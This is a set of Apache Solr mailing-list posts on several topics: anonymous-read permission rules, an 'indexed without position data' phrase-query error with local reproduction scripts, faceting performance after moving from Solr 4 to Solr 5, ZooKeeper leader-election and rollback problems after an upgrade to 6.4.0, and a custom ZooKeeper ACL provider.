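      { "name": "all-core-handlers", "path": "/*", "role": "allgen" }
    ],
    "user-role": { "admin": "allgen" }
  }
}
```

With something like this in place, /select requests need no credentials, while everything else (including the front page of the admin UI) requires a login mapped to the allgen role.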
Anonymous Read?
Is it possible to set up Solr security to allow anonymous queries (/select etc.) but restrict access for other permissions, as described in https://lucidworks.com/2015/08/17/securing-solr-basic-auth-permission-rules/ ?
Re: Work-around for "indexed without position data"
Sorry for the delay. I was able to reproduce this easily with my setup, but reproducing this on a Solr example proved challenging. Hopefully the work that I did to find the situation in which this is produced will help in resolving the problem. The driving factor for this appears to be how updates are sent to Solr. When sending batches of updates with commits, the problem is reproduced. If the commit is held until after all updates are sent, then no problem is produced. This leads me to believe that this issue has something to do with overlapping commits or index merges. This was reproducible regardless of running classic or managed schema and regardless of running Solr core or SolrCloud. There are not many steps to reproduce this, but you will need a way to send these updates. I have included inline create.sh and create.pl scripts to generate the data and send the updates. You can index a lastModified field or something to convince yourself that everything has been re-indexed. I left that out to keep the steps lean. Also, this test is using commit statements from the client sending the updates for simplicity even though it is not a good practice. My normal setup is using Solrj with commitWithin to allow Solr to manage when the commits take place, but the same error is produced either way.

*STEPS TO REPRODUCE*
1. Install Solr 5.5.3 and change to that working directory
2. bin/solr -e techproducts
3. bin/solr stop [Why these next 3 steps? These are to start the index completely new without the 32 example documents, as opposed to a delete query. The documents are not posted after the core is detected the second time.]
4. rm -rf ./example/techproducts/solr/techproducts/data/
5. bin/solr -e techproducts
6. ./create.sh
7. curl -X POST -H 'Content-type:application/json' --data-binary '{ "replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true, "multiValued":true, "stored":true } }' http://localhost:8983/solr/techproducts/schema
8.
http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22 [error]
9. ./create.sh
10. http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22 [error even though all documents have been re-indexed]

*create.sh*
#!/bin/bash
for i in {1..100}; do
  echo "$i"
  ./create.pl $i > ./create.xml$i
  curl http://localhost:8983/solr/techproducts/update?commit=true -H "Content-Type: text/xml" --data-binary @./create.xml$i
done

*create.pl*
#!/usr/bin/perl
my $S = $ARGV[0];
my $I = 100;
my $N = $S*$I + $I;
my $i;
print "<add>\n";
for($i=$S*$I; $i<$N; $i++) {
  print "<doc><field name=\"id\">SP${i}</field><field name=\"cat\">hard drive ${i}</field></doc>\n";
}
print "</add>\n";

On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote: > Can you reproduce this error? What are the steps you take to reproduce it? > (simple is better). > > cheers -- Rick > > On 2017-05-25 05:46 PM, Solr User wrote: >> This is in regards to changing a field type from string to text_en_splitting, re-indexing all documents, even optimizing to give the index a chance to merge segments and rewrite itself entirely, and then getting this error when running a phrase query: java.lang.IllegalStateException: field "blah" was indexed without position data; cannot run PhraseQuery >> I have encountered this issue before and have always done one of the following as a work-around: 1. Instead of changing the field type on an existing field just create a new field and retire the old one. 2. Delete the index directory and start from scratch. >> These work-arounds are not always ideal. Does anyone know what is holding onto that old field type definition? What thinks it is still a string? Every document has been re-indexed and I am sure of this because I have a time stamp indexed. Is there any other way to get this to work? >> For what it is worth, I am running this in SolrCloud mode but I remember seeing this issue before SolrCloud was released as well.
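For readers without Perl handy, a Python sketch that builds the same kind of batch as create.pl. The `<add>`/`<doc>`/`<field>` markup is the standard Solr XML update format; the exact tags in the original script were mangled by the list archive, so this is a reconstruction, not a verbatim port:

```python
def update_xml(batch, size=100):
    """Build one Solr XML update message for a batch number, as create.pl
    does: `size` docs with ids SP<n> and a cat field of "hard drive <n>"."""
    docs = []
    for i in range(batch * size, batch * size + size):
        docs.append(
            '<doc><field name="id">SP%d</field>'
            '<field name="cat">hard drive %d</field></doc>' % (i, i)
        )
    return "<add>\n" + "\n".join(docs) + "\n</add>"

# Batch 1 covers ids SP100..SP199, matching create.pl's $S*$I .. $S*$I+$I-1 range.
xml = update_xml(1)
```

Each resulting string can be POSTed to /update with Content-Type text/xml exactly as the curl line in create.sh does.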
Work-around for "indexed without position data"
This is in regards to changing a field type from string to text_en_splitting, re-indexing all documents, even optimizing to give the index a chance to merge segments and rewrite itself entirely, and then getting this error when running a phrase query: java.lang.IllegalStateException: field "blah" was indexed without position data; cannot run PhraseQuery I have encountered this issue before and have always done one of the following as a work-around: 1. Instead of changing the field type on an existing field just create a new field and retire the old one. 2. Delete the index directory and start from scratch. These work-arounds are not always ideal. Does anyone know what is holding onto that old field type definition? What thinks it is still a string? Every document has been re-indexed and I am sure of this because I have a time stamp indexed. Is there any other way to get this to work? For what it is worth, I am running this in SolrCloud mode but I remember seeing this issue before SolrCloud was released as well.
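To make the error message concrete: a phrase query needs per-document term positions, and a string-typed field never writes them. A toy sketch of position-aware postings — a simplified illustration, not Lucene's actual data structures:

```python
# term -> {doc_id: [positions]}; a text field's postings look roughly like
# this, while a string-typed field records only which docs contain the term,
# so the position lists below simply do not exist in its segments.
postings = {
    "hard":  {1: [0], 2: [3]},
    "drive": {1: [1], 2: [0]},
}

def phrase_hits(postings, terms):
    # Candidate docs must contain every term...
    docs = set(postings[terms[0]])
    for t in terms[1:]:
        docs &= set(postings[t])
    hits = []
    for d in sorted(docs):
        # ...but a phrase match also needs the terms at consecutive
        # positions, which is exactly the data missing from segments
        # written while the field was still a string (hence the
        # IllegalStateException instead of a silent wrong answer).
        for p in postings[terms[0]][d]:
            if all(p + k in postings[terms[k]][d] for k in range(1, len(terms))):
                hits.append(d)
                break
    return hits

print(phrase_hits(postings, ["hard", "drive"]))  # -> [1]
```

Doc 2 contains both terms but not adjacently, so only doc 1 matches the phrase. Old segments indexed under the string type keep their old (position-less) format until they are merged away, which is why re-indexing into the same index does not immediately cure the error.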
Re: Faceting and Grouping Performance Degradation in Solr 5
I am pleased to report that we are in Production on Solr 5.5.3 with comparable performance to Solr 4.8.1 through leveraging facet.method=uif as well as https://issues.apache.org/jira/browse/SOLR-9176. Thanks to everyone who worked on these! On Mon, Oct 3, 2016 at 3:55 PM, Solr User <solr...@gmail.com> wrote: > Below is some further testing. This was done in an environment that had no other queries or updates during testing. We ran through several scenarios so I pasted this with HTML formatting below so you may view this as a table. Sorry if you have to pull this out into a different file for viewing, but I did not want the formatting to be messed up. The times are average times in milliseconds. Same test methodology as above except there was a 5 minute warmup and a 15 minute test.
> Note that both the segment and deletions were recorded from only 1 out of 2 of the shards so we cannot try to extrapolate a function between them and the outcome. In other words, just view them as "non-optimized" versus "optimized" and "has deletions" versus "no deletions". The only exceptions are the 0 deletes were true for both shards and the 1 segment and 8 segment cases were true for both shards. A few of the tests were repeated as well.
> The only conclusion that I could draw is that the number of segments and the number of deletes appear to greatly influence the response times, at least more than any difference in Solr version. There also appears to be some external contributor to variance... maybe network, etc.
> Thoughts?
>
> Date: 9/29/2016, 9/29/2016, 9/29/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 9/30/2016, 10/3/2016, 10/3/2016, 10/3/2016, 10/3/2016
> Solr Version: 5.5.2, 5.5.2, 4.8.1, 4.8.1, 4.8.1, 5.5.2, 5.5.2, 5.5.2, 5.5.2, 5.5.2, 5.5.2, 5.5.2, 5.5.2, 4.8.1, 4.8.1, 4.8.1, 4.8.1
> Deleted Docs: 57873, 57873, 176958, 593694, 593694, 57873, 57873, 57873, 57873, 0, 0, 0, 0
> Segment Count: 34, 34, 18, 27, 27, 34, 34, 34, 34, 8, 8, 1, 1, 8, 8, 1, 1
> facet.method=uif: YES, YES, N/A, N/A, N/A, YES, YES, NO, NO, NO, YES, YES, NO, N/A, N/A, N/A, N/A
> Scenario #1: 198, 210, 145, 186, 190, 208, 209, 210, 206, 109, 142, 73, 70, 160, 109, 83, 85
> Scenario #2: 92, 88, 59, 62, 58, 72, 70, 77, 74, 68, 73, 63, 61, 66, 54, 52, 51
>
> On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote: >> I plan to re-test this in a separate environment that I have more control over and will share the results when I can. >> On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote: >>> Certainly. And I would of course welcome anyone else to test this for themselves especially with facet.method=uif to see if that has indeed bridged the gap between Solr 4 and Solr 5. I would be very happy if my testing is invalid due to variance, problem in process, etc. One thing I was pondering is if I should force merge the index to a certain amount of segments because indexing yields a random number of segments and deletions. The only thing stopping me short of doing that were observations of longer Solr 4 times even with more deletions and similar number of segments.
>>> We use Soasta as our testing tool. Before testing, load is sent for 10-15 minutes to make sure any Solr caches have stabilized. Then the test is run for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and Scenario #2 tested at 100 req/sec. Each request is different with input being pulled from data files. The requests are repeatable test to test.
>>> The numbers posted above are average response times as reported by Soasta. However, respective time differences are supported by Splunk which indexes the Solr logs and Dynatrace which is instrumented on one of the JVM's.
>>> >>> The versions are deployed to the same machines thereby overlaying the >>> previous installation. Going Solr 4 to Solr 5, full indexing is run with >>> the same input data. Being in SolrCloud mode, the full indexing comprises >>> of indexing all documents and then deleting any that were not touched. >>> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not >>> load with a Solr 5 index. Testing Solr 4 after reverting yields the same >>> results as the previous Solr 4 test. >>> >>> >>> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> >>>
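For anyone wanting to repeat the comparison, facet.method=uif is just a per-request parameter (available from Solr 5.5). A small sketch of building such a request URL; the host, collection, and field names are placeholders, not values from the thread:

```python
from urllib.parse import urlencode

params = {
    "q": "*:*",
    "rows": 0,
    "facet": "true",
    "facet.field": "cat",   # placeholder facet field
    "facet.method": "uif",  # UnInvertedField-based faceting (Solr 5.5+)
}
# Placeholder host and collection; adjust for your cluster.
url = "http://localhost:8983/solr/techproducts/select?" + urlencode(params)
print(url)
```

Issuing the same faceting query with and without the facet.method=uif parameter is enough to reproduce an A/B timing comparison like the table above.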
Re: 6.4.0 collection leader election and recovery issues
Thanks Shawn. Yes, I did index some docs after moving to 6.4.0. The release notes did not mention anything about the format being changed, so I thought it would be backward compatible. Yeah, my only recourse is to re-index the data. Apart from that, there were weird problems overall with 6.4.0. I was excited about using the unified highlighter, but the ZooKeeper flakiness, constant disconnections of Solr, and sometimes not electing a leader for some collections made me roll back. Anyway, thanks for promptly responding; I will be more careful from next time. Thanks Ravi Kiran Bhaskar On Thu, Feb 2, 2017 at 9:41 AM, Shawn Heisey <apa...@elyograg.org> wrote: > On 2/2/2017 7:23 AM, Ravi Solr wrote: > > When i try to rollback from 6.4.0 to my original version of 6.0.1 it now throws another issue. Now I cant go to 6.4.0 nor can I roll back to 6.0.1 > > Could not load codec 'Lucene62'. Did you forget to add lucene-backward-codecs.jar? > > at org.apache.lucene.index.SegmentInfos.readCodec(SegmentInfos.java:429) > > at org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349) > > at org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284) > > Hope this doesnt cost me dearly. Any ideas at least on how to rollback safely. > This sounds like you did some indexing after the upgrade, or possibly some index optimizing, so the parts of the index that were written (or merged) by the newer version are now in a format that the older version cannot use. Perhaps the merge policy was changed, causing Solr to do some automatic merges once it started up. I am not aware of anything in Solr that would write new segments without indexing input or a merge policy change. > As far as I know, there is no straightforward way to go backwards with the index format. If you want to downgrade and don't have a backup of your indexes from before the upgrade, you'll probably need to wipe the index directory and completely reindex.
> > Solr will always use the newest default index format for new segments > when you upgrade. Contrary to many user expectations, setting > luceneMatchVersion will *NOT* affect the index format, only the behavior > of components that do field analysis. > > Downgrading the index format would involve writing a custom Lucene > program that changes the active index format to the older version, then > runs a forceMerge on the index. It would be completely separate from > Solr, and definitely not straightforward. > > Thanks, > Shawn > >
Re: 6.4.0 collection leader election and recovery issues
Thanks Hendrik. I am baffled as to why I did not hit this issue prior to moving to 6.4.0. On Thu, Feb 2, 2017 at 7:58 AM, Hendrik Haddorp <hendrik.hadd...@gmx.net> wrote: > Might be that your overseer queue got overloaded. Similar to what is described here: https://support.lucidworks.com/hc/en-us/articles/203959903-Bringing-up-downed-Solr-servers-that-don-t-want-to-come-up > If the overseer queue gets too long you get hit by this: https://github.com/Netflix/curator/wiki/Tech-Note-4 > Try to request the overseer status (/solr/admin/collections?action=OVERSEERSTATUS). If that fails you likely hit that problem. If so you can also not use the ZooKeeper command line client anymore. You can now restart all your ZK nodes with an increased jute.maxbuffer value. Once ZK is restarted you can use the ZK command line client with the same jute.maxbuffer value and check how many entries /overseer/queue has in ZK. Normally there should be a few entries but if you see thousands then you should delete them. I used a few lines of Java code for that, again setting jute.maxbuffer to the same value. Once cleaned up restart the Solr nodes one by one and keep an eye on the overseer status. > On 02.02.2017 10:52, Ravi Solr wrote: >> Following up on my previous email, the intermittent server unavailability seems to be linked to the interaction between Solr and Zookeeper. Can somebody help me understand what this error means and how to recover from it. >> 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying to recover.
>> core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperE >> xception$SessionExpiredException: >> KeeperErrorCode = Session expired for /overseer/queue/qn- >> at org.apache.zookeeper.KeeperException.create(KeeperException. >> java:127) >> at org.apache.zookeeper.KeeperException.create(KeeperException. >> java:51) >> at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783) >> at >> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl >> ient.java:391) >> at >> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl >> ient.java:388) >> at >> org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(Zk >> CmdExecutor.java:60) >> at >> org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388) >> at >> org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244) >> at org.apache.solr.cloud.ZkController.publish(ZkController. >> java:1215) >> at org.apache.solr.cloud.ZkController.publish(ZkController. >> java:1128) >> at org.apache.solr.cloud.ZkController.publish(ZkController. >> java:1124) >> at >> org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoverySt >> rategy.java:334) >> at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy. 
>> java:222) >> at >> com.codahale.metrics.InstrumentedExecutorService$Instrumente >> dRunnable.run(InstrumentedExecutorService.java:176) >> at >> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) >> at java.util.concurrent.FutureTask.run(FutureTask.java:266) >> at >> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolE >> xecutor.lambda$execute$0(ExecutorUtil.java:229) >> at >> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPool >> Executor.java:1142) >> at >> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoo >> lExecutor.java:617) >> at java.lang.Thread.run(Thread.java:745) >> >> Thanks >> >> Ravi Kiran Bhaskar >> >> On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote: >> >> Hello, >>> Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 >>> hours of debugging spree!! Can somebody kindly help me out of this >>> misery. >>> >>> I have a set has 8 single shard collections with 3 replicas. As soon as I >>> updated the configs and started the servers one of my collection got >>> stuck >>> with no leader. I have restarted solr to no avail, I also tried to force >>> a >>> leader via collections API that dint work either. I also see that, from >>> time to time multiple solr nodes go down all at the sam
Re: 6.4.0 collection leader election and recovery issues
When i try to rollback from 6.4.0 to my original version of 6.0.1 it now throws another issue. Now I cant go to 6.4.0 nor can I roll back to 6.0.1 Could not load codec 'Lucene62'. Did you forget to add lucene-backward-codecs.jar? at org.apache.lucene.index.SegmentInfos.readCodec(SegmentInfos.java:429) at org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349) at org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284) Hope this doesnt cost me dearly. Any ideas at least on how to rollback safely. Thanks Ravi Kiran Bhaskar On Thu, Feb 2, 2017 at 4:52 AM, Ravi Solr <ravis...@gmail.com> wrote: > Following up on my previous email, the intermittent server unavailability > seems to be linked to the interaction between Solr and Zookeeper. Can > somebody help me understand what this error means and how to recover from > it. > > 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16- > processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4 > s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3 > x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying > to recover. core=clicktrack_shard1_replica4:org.apache.zookeeper. 
> KeeperException$SessionExpiredException: KeeperErrorCode = Session > expired for /overseer/queue/qn- > at org.apache.zookeeper.KeeperException.create( > KeeperException.java:127) > at org.apache.zookeeper.KeeperException.create( > KeeperException.java:51) > at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783) > at org.apache.solr.common.cloud.SolrZkClient$9.execute( > SolrZkClient.java:391) > at org.apache.solr.common.cloud.SolrZkClient$9.execute( > SolrZkClient.java:388) > at org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation( > ZkCmdExecutor.java:60) > at org.apache.solr.common.cloud.SolrZkClient.create( > SolrZkClient.java:388) > at org.apache.solr.cloud.DistributedQueue.offer( > DistributedQueue.java:244) > at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215) > at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128) > at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124) > at org.apache.solr.cloud.RecoveryStrategy.doRecovery( > RecoveryStrategy.java:334) > at org.apache.solr.cloud.RecoveryStrategy.run( > RecoveryStrategy.java:222) > at com.codahale.metrics.InstrumentedExecutorService$ > InstrumentedRunnable.run(InstrumentedExecutorService.java:176) > at java.util.concurrent.Executors$RunnableAdapter. > call(Executors.java:511) > at java.util.concurrent.FutureTask.run(FutureTask.java:266) > at org.apache.solr.common.util.ExecutorUtil$ > MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229) > at java.util.concurrent.ThreadPoolExecutor.runWorker( > ThreadPoolExecutor.java:1142) > at java.util.concurrent.ThreadPoolExecutor$Worker.run( > ThreadPoolExecutor.java:617) > at java.lang.Thread.run(Thread.java:745) > > Thanks > > Ravi Kiran Bhaskar > > On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote: > >> Hello, >> Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 >> hours of debugging spree!! Can somebody kindly help me out of this misery. 
>> >> I have a set has 8 single shard collections with 3 replicas. As soon as I >> updated the configs and started the servers one of my collection got stuck >> with no leader. I have restarted solr to no avail, I also tried to force a >> leader via collections API that dint work either. I also see that, from >> time to time multiple solr nodes go down all at the same time, only a >> restart resolves the issue. >> >> The error snippets are shown below >> >> 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n: >> 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1 >> c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1 >> x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying >> to recover. >> core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: >> No registered leader was found after waiting for 4000ms , collection: >> clicktrack slice: shard1 >> >> solr.log.9:2017-02-02 01:43:41.336 INFO (zkCallback-4-thread-29-proces >> sing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster >> state change: [WatchedEvent state:SyncConnected type:NodeDataChanged >> path:/collections/clicktrack/state.json] for collection [clicktrack] has >> occurred - updating... (live nodes size: [1]) >> solr.log.9:2017-02-02 01:43:42.224 INFO (zkCallback-4-thread-29-proces &
Re: 6.4.0 collection leader election and recovery issues
Following up on my previous email, the intermittent server unavailability seems to be linked to the interaction between Solr and Zookeeper. Can somebody help me understand what this error means and how to recover from it. 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying to recover. core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperException$SessionExpiredException: KeeperErrorCode = Session expired for /overseer/queue/qn- at org.apache.zookeeper.KeeperException.create(KeeperException.java:127) at org.apache.zookeeper.KeeperException.create(KeeperException.java:51) at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783) at org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:391) at org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:388) at org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(ZkCmdExecutor.java:60) at org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388) at org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244) at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215) at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128) at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124) at org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoveryStrategy.java:334) at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy.java:222) at com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:176) at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) at java.util.concurrent.FutureTask.run(FutureTask.java:266) at org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229) at 
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at java.lang.Thread.run(Thread.java:745) Thanks Ravi Kiran Bhaskar On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote: > Hello, > Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 > hours of debugging spree!! Can somebody kindly help me out of this misery. > > I have a set has 8 single shard collections with 3 replicas. As soon as I > updated the configs and started the servers one of my collection got stuck > with no leader. I have restarted solr to no avail, I also tried to force a > leader via collections API that dint work either. I also see that, from > time to time multiple solr nodes go down all at the same time, only a > restart resolves the issue. > > The error snippets are shown below > > 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n: > 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1 > c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1 > x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying > to recover. > core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: > No registered leader was found after waiting for 4000ms , collection: > clicktrack slice: shard1 > > solr.log.9:2017-02-02 01:43:41.336 INFO (zkCallback-4-thread-29- > processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A > cluster state change: [WatchedEvent state:SyncConnected > type:NodeDataChanged path:/collections/clicktrack/state.json] for > collection [clicktrack] has occurred - updating... 
(live nodes size: [1]) > solr.log.9:2017-02-02 01:43:42.224 INFO (zkCallback-4-thread-29- > processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A > cluster state change: [WatchedEvent state:SyncConnected > type:NodeDataChanged path:/collections/clicktrack/state.json] for > collection [clicktrack] has occurred - updating... (live nodes size: [1]) > solr.log.9:2017-02-02 01:43:43.767 INFO (zkCallback-4-thread-23- > processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A > cluster state change: [WatchedEvent state:SyncConnected > type:NodeDataChanged path:/collections/clicktrack/state.json] for > collection [clicktrack] has occurred - updating... (live nodes size: [1]) > > > Suspecting the worst I backed up the index and renamed the collection's > data folder and restarted the servers, this time the collection got a > proper leader. So is my index really corrupted ? Solr UI showed live nodes > just like the logs but without any leader. Even with the leader issue > somewhat alleviated after renaming the data folder and letting silr create > a ne
6.4.0 collection leader election and recovery issues
Hello, Yesterday I upgraded from 6.0.1 to 6.4.0, and it's been a straight 12 hours of debugging! Can somebody kindly help me out of this misery. I have a set of 8 single-shard collections with 3 replicas. As soon as I updated the configs and started the servers, one of my collections got stuck with no leader. I have restarted Solr to no avail; I also tried to force a leader via the collections API, but that didn't work either. I also see that, from time to time, multiple Solr nodes go down all at the same time, and only a restart resolves the issue. The error snippets are shown below:

2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n:10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1 c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1 x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying to recover. core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: No registered leader was found after waiting for 4000ms , collection: clicktrack slice: shard1

solr.log.9:2017-02-02 01:43:41.336 INFO (zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent state:SyncConnected type:NodeDataChanged path:/collections/clicktrack/state.json] for collection [clicktrack] has occurred - updating... (live nodes size: [1])

solr.log.9:2017-02-02 01:43:42.224 INFO (zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent state:SyncConnected type:NodeDataChanged path:/collections/clicktrack/state.json] for collection [clicktrack] has occurred - updating... (live nodes size: [1])

solr.log.9:2017-02-02 01:43:43.767 INFO (zkCallback-4-thread-23-processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent state:SyncConnected type:NodeDataChanged path:/collections/clicktrack/state.json] for collection [clicktrack] has occurred - updating... (live nodes size: [1])

Suspecting the worst, I backed up the index, renamed the collection's data folder, and restarted the servers; this time the collection got a proper leader. So is my index really corrupted? The Solr UI showed live nodes just like the logs, but without any leader. Even with the leader issue somewhat alleviated after renaming the data folder and letting Solr create a new data folder, my servers did go down a couple of times. I am not all that well versed with ZooKeeper... any trick to make ZooKeeper pick a leader and be happy? Did anybody have Solr/ZooKeeper issues with 6.4.0? Thanks Ravi Kiran Bhaskar
Re: ClassNotFoundException with Custom ZkACLProvider
For those interested, I ended up bundling the customized ACL provider with the solr.war. I could not stomach looking at the stack trace in the logs. On Mon, Nov 7, 2016 at 4:47 PM, Solr User <solr...@gmail.com> wrote: > This is mostly just an FYI regarding future work on issues like SOLR-8792. > I wanted admin update but world read on ZK since I do not have anything sensitive from a read perspective in the Solr data and did not want to force all SolrCloud clients to implement authentication just for read. So, I extended DefaultZkACLProvider and implemented a replacement for VMParamsAllAndReadonlyDigestZkACLProvider. > My custom code is loaded from the sharedLib in solr.xml. However, there is a temporary ZK lookup to read solr.xml (and chroot) which is obviously done before loading sharedLib. Therefore, I am faced with a ClassNotFoundException. This has no negative effect on the ACL functionality... just the annoying stack trace in the logs. I do not want to package this custom code with the Solr code and do not want to package this along with Solr dependencies in the Jetty lib/ext. > So, I am planning to live with the stack trace and just wanted to share this for any future work on the dynamic solr.xml and chroot lookups or in case I am missing some work-around. > Thanks!
ClassNotFoundException with Custom ZkACLProvider
This is mostly just an FYI regarding future work on issues like SOLR-8792. I wanted admin update but world read on ZK since I do not have anything sensitive from a read perspective in the Solr data and did not want to force all SolrCloud clients to implement authentication just for read. So, I extended DefaultZkACLProvider and implemented a replacement for VMParamsAllAndReadonlyDigestZkACLProvider. My custom code is loaded from the sharedLib in solr.xml. However, there is a temporary ZK lookup to read solr.xml (and chroot) which is obviously done before loading sharedLib. Therefore, I am faced with a ClassNotFoundException. This has no negative effect on the ACL functionality... just the annoying stack trace in the logs. I do not want to package this custom code with the Solr code and do not want to package this along with Solr dependencies in the Jetty lib/ext. So, I am planning to live with the stack trace and just wanted to share this for any future work on the dynamic solr.xml and chroot lookups or in case I am missing some work-around. Thanks!
Re: Faceting and Grouping Performance Degradation in Solr 5
Below is some further testing. This was done in an environment that had no other queries or updates during testing. We ran through several scenarios; the results are laid out below as a plain-text table, one line per test run. The times are average times in milliseconds. Same test methodology as above except there was a 5 minute warmup and a 15 minute test. Note that both the segment and deletion counts were recorded from only 1 out of 2 of the shards so we cannot try to extrapolate a function between them and the outcome. In other words, just view them as "non-optimized" versus "optimized" and "has deletions" versus "no deletions". The only exceptions are the 0 deletes were true for both shards and the 1 segment and 8 segment cases were true for both shards. A few of the tests were repeated as well. The only conclusion that I could draw is that the number of segments and the number of deletes appear to greatly influence the response times, at least more than any difference in Solr version. There also appears to be some external contributor to variance, maybe network, etc. Thoughts?

Date       Version  Deleted Docs  Segments  facet.method=uif  Scenario #1  Scenario #2
9/29/2016  5.5.2    57873         34        YES               198          92
9/29/2016  5.5.2    57873         34        YES               210          88
9/29/2016  4.8.1    176958        18        N/A               145          59
9/30/2016  4.8.1    593694        27        N/A               186          62
9/30/2016  4.8.1    593694        27        N/A               190          58
9/30/2016  5.5.2    57873         34        YES               208          72
9/30/2016  5.5.2    57873         34        YES               209          70
9/30/2016  5.5.2    57873         34        NO                210          77
9/30/2016  5.5.2    57873         34        NO                206          74
9/30/2016  5.5.2    0             8         NO                109          68
9/30/2016  5.5.2    0             8         YES               142          73
9/30/2016  5.5.2    0             1         YES               73           63
9/30/2016  5.5.2    0             1         NO                70           61
10/3/2016  4.8.1    0             8         N/A               160          66
10/3/2016  4.8.1    0             8         N/A               109          54
